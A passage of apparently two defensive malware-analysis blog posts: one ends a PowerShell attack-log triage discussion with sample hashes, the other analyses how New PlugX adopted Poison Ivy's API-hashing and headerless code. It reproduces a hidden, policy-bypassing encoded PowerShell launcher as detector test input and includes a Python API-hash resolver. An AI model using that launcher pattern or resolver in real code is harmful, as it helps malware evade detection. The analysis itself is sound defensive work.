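    # Constructed process-creation command lines; the first reproduces the post's launcher.
    sample = [
        "powershell.exe -nop -w hidden -exec bypass -enc " + encode_command(CHCHES_STAGE1),
        "powershell.exe -Command Get-Process",
    ]
    for line, r in triage_log(sample):
        print(r["indicators"], (r["decoded"] or line)[:60])
```

Running the decoder over the truncated fragment shown earlier in this post (JAAyAD0AJwAtAG4Abw) yields the readable prefix $2='-n, which is enough to confirm it is the same launcher. The "no-profile" indicator alone is weak (administrators use -NoProfile routinely); the combination with a hidden window, a bypassed execution policy and a download cradle is what makes the line worth escalating.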

Summary

It is now quite common for PowerShell scripts to be leveraged in attacks. If your event log configuration does not record PowerShell execution, we recommend revising the settings in preparation for such attacks. Also, if you are not using PowerShell, it is advisable to restrict its execution using AppLocker or similar.

-Shusei Tomonaga

(Translated by Yukako Uchida)


References:

[1] PowerSploit

https://github.com/PowerShellMafia/PowerSploit

Appendix A: SHA-256 Hash Values of the samples

PowerShell

  • 4ff6a97d06e2e843755be8697f3324be36e1ebeb280bb45724962ce4b6710297
  • 75ef6ea0265d2629c920a6a1c0d1dd91d3c0eda86445c7d67ebb9b30e35a2a9f
  • ae0dd5df608f581bbc075a88c48eedeb7ac566ff750e0a1baa7718379941db86
  • 646f837a9a5efbbdde474411bb48977bff37abfefaa4d04f9fb2a05a23c6d543
  • 3d5e3648653d74e2274bb531d1724a03c2c9941fdf14b8881143f0e34fe50f03
  • 9fbd69da93fbe0e8f57df3161db0b932d01b6593da86222fabef2be31899156d
  • 723983883fc336cb575875e4e3ff0f19bcf05a2250a44fb7c2395e564ad35d48
  • f45b183ef9404166173185b75f2f49f26b2e44b8b81c7caf6b1fc430f373b50b
  • 471b7edbd3b344d3e9f18fe61535de6077ea9fd8aa694221529a2ff86b06e856
  • aef976b95a8d0f0fdcfe1db73d5e0ace2c748627c1da645be711d15797c5df38
  • dbefa21d3391683d7cc29487e9cd065be188da228180ab501c34f0e3ec2d7dfc

Feb 21, 2017

PlugX + Poison Ivy = PlugIvy? - PlugX Integrating Poison Ivy’s Code -

Hi again, this is Shusei Tomonaga from the Analysis Center.

PlugX is a type of malware used for targeted attacks. We introduced its new features in the blog article “Analysis of a Recent PlugX Variant - ‘P2P PlugX’”. This article discusses the following two structural changes observed in PlugX since April 2016:

  • the way Windows APIs are called
  • the format of the main module, which changed from PE to raw binary code

In this article, we will refer to PlugX observed after April 2016 as “New PlugX”, and older versions as “Old PlugX”.

Change in API call

When calling Windows APIs, Old PlugX resolved the address of each function using its API name as the key, in the same way an ordinary PE file calls APIs. Old PlugX code therefore contains the Windows API names as strings.

In contrast, New PlugX contains no API name strings; instead it holds hash values of those names. When calling an API, it enumerates the exported functions of the loaded libraries using Windows functions, hashes each name in turn, and uses the name whose hash matches the specified value as the key to call the API. This technique is used when code without an IAT (Import Address Table), that is, code other than PE format, has to call Windows APIs, and it is commonly applied in shellcode. It is also used by some malware families in order to conceal API names.

The code in Figure 1 shows how New PlugX calls the Windows API GetSystemInfo. 86AA8709h is the hash value for GetSystemInfo. The address is resolved from the hash value, and execution jumps to GetSystemInfo by “jmp eax”.

Figure 1: The function calling for GetSystemInfo

In principle, any hash algorithm can be used for hashing Windows API names as long as collisions do not occur. New PlugX, however, uses the same hash algorithm as Poison Ivy. Figure 2 compares the hash functions of New PlugX and Poison Ivy.

Figure 2: Windows API hash function for New PlugX (left) and Poison Ivy (right) (Parts that match are in light blue)
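To make the mechanism concrete, here is an added example (not PlugX or Poison Ivy code) of hash-based API resolution in Python, together with the reverse table an analyst builds to label constants such as 86AA8709h in a disassembly. The hash used is the ROR-13 additive hash common in shellcode (for instance Metasploit's block_api), chosen because it is well known; the post shows the PlugX/Poison Ivy function only as a figure and this example does not reproduce it, so 86AA8709h will not resolve here. The export lists are a constructed stand-in for the PE export directories a real resolver walks:

```python
"""Resolve Windows APIs by a hash of their export names, the mechanism New
PlugX borrows from shellcode, and build the reverse table an analyst uses to
label such constants.  Added example, not PlugX or Poison Ivy code.  The hash
below is the ROR-13 additive hash common in shellcode (e.g. Metasploit's
block_api); the post shows the PlugX/Poison Ivy function only as a figure and
this example does not reproduce it, so 86AA8709h will not resolve here."""


def ror32(value: int, count: int) -> int:
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def api_hash(name: str) -> int:
    """ROR-13 additive hash over the ASCII export name."""
    h = 0
    for c in name.encode("ascii"):
        h = (ror32(h, 13) + c) & 0xFFFFFFFF
    return h


# Constructed stand-in for the export name tables a real resolver walks via the
# PE export directory of each loaded module (a handful of names, not the real lists).
FAKE_EXPORTS = {
    "kernel32.dll": ["GetSystemInfo", "VirtualAlloc", "CreateFileW", "WriteProcessMemory", "Sleep"],
    "ws2_32.dll": ["WSAStartup", "connect", "send", "recv"],
}


def resolve_by_hash(target: int, exports=FAKE_EXPORTS):
    """Malware side: hash every export name until one matches.  The binary
    only needs to carry the 32-bit constant, never the API name string."""
    for module, names in exports.items():
        for name in names:
            if api_hash(name) == target:
                return module, name
    return None


def build_lookup(exports=FAKE_EXPORTS) -> dict:
    """Analyst side: precompute hash -> (module, name) once, then annotate the
    constants seen in disassembly.  A collision would make the malware's own
    resolver ambiguous too, so it is reported rather than silently overwritten."""
    table = {}
    for module, names in exports.items():
        for name in names:
            h = api_hash(name)
            if h in table and table[h] != (module, name):
                raise ValueError(f"hash collision {h:#010x}: {table[h]} vs {(module, name)}")
            table[h] = (module, name)
    return table


if __name__ == "__main__":
    lookup = build_lookup()
    for h, (module, name) in sorted(lookup.items()):
        print(f"{h:#010x}  {module}!{name}")
```

Swapping api_hash for the algorithm recovered from Figure 2 and feeding it the real export tables of kernel32.dll, ws2_32.dll and the other modules the sample loads turns this into the lookup that maps 86AA8709h back to GetSystemInfo.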

Change from PE format to raw code format

While Old PlugX stored the malware in PE format (DLL), New PlugX stores only its code, without a header. A single Old PlugX sample (‘PlugX Data’ in Figure 3) contains both the encoded PlugX and the code to decode it (‘Decoding code’ in Figure 3). When the sample is executed, the main module of PlugX (‘PlugX main module’ in Figure 3) is decoded and injects itself into another process, where it is executed. The execution flow of Old PlugX is described in Figure 3.

Figure 3: Execution flow in Old PlugX

Figure 4 describes the execution flow of New PlugX. As in Old PlugX, the encoded main module injects itself into a process and is executed there. The big difference is that the main module has changed from PE format (DLL) in Old PlugX to raw code format in New PlugX.

Figure 4: Execution flow in New PlugX

Figure 5 shows the beginning of the decoded main module of PlugX. While Old PlugX has a PE header, New PlugX begins directly with executable code and has no PE header.

Figure 5: Old PlugX (above) and New PlugX (below) after decoding

Summary

In upgrading Old PlugX to New PlugX, the developer presumably referred to Poison Ivy, which is also used for targeted attacks. As explained above, New PlugX uses the same hash algorithm for API calls as Poison Ivy, and on top of that the raw code format New PlugX adopts is also one of Poison Ivy's features. The purpose of the upgrade is thought to be to complicate malware analysis so that the malware can be used for a longer period.

We should keep an eye on PlugX because it continues to evolve and is still constantly used in targeted attacks. At this stage, both New and Old PlugX are actively used.

We recommend that you revisit our previous article, since the features demonstrated there (configuration information, communication method, encoding format, etc.) remain the same in New PlugX.

Thanks for reading.

- Shusei Tomonaga

(Translated by Yukako Uchida)